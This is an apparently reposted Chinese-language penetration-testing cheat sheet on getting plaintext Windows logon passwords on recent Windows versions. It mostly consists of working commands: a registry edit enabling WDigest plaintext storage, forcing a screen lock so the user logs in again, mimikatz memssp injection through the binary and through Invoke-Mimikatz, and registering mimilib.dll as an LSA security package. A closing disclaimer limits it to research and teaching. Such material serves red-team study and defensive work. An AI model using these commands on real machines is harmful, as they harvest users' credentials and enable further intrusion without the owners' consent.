|
0x01 前言
0x02 改注册表(mimitaze存在免杀问题)
修改成记录明文密码
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
修改不记录明文密码
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
锁屏
rundll32.exe user32.dll,LockWorkStation
修改完之后使用命令锁屏,接下来等待用户再次登录一次就可以抓到了
0x03 mimikatz插ssp记录密码
privilege::debug、misc::memssp
rundll32.exe user32.dll,LockWorkStation
0x04 使用Invoke-Mimikatz.ps1
Import-Module .Invoke-Mimikatz.ps1 //导入命令
Invoke-Mimikatz -Command "misc::memssp" //不需要重启获取
记录的明文密码存储在这个路径下
凭据收集总结:
https://cloud.tencent.com/developer/article/1656546
0x05 复制mimilib.dll+修改注册表
reg add HKLMSYSTEMCurrentControlSetControlLsa /v "Security Packages" /t REG_MULTI_SZ /d mimilib.dll /f
渗透技巧-通过CredSSP导出用户的明文口令:
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87CredSSP%E5%AF%BC%E5%87%BA%E7%94%A8%E6%88%B7%E7%9A%84%E6%98%8E%E6%96%87%E5%8F%A3%E4%BB%A4/
本文始发于微信公众号(SecPulse安全脉搏):获取Windows高版本明文密码
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论